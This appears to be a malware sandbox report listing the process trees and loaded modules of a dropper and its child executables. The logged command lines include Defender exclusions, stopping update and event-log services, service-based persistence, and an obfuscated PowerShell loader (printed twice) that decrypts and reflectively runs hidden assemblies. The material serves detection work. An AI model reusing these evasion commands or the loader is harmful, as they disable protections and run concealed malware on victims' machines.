Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "YUPXPWRM"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "YUPXPWRM"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe "C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe"
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe
Source: C:\Windows\System32\dialer.exe	Process created: C:\Windows\System32\Conhost.exe
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe "C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\Conhost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4628 -ip 4628
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 920
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "YUPXPWRM"
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto"
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "YUPXPWRM"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
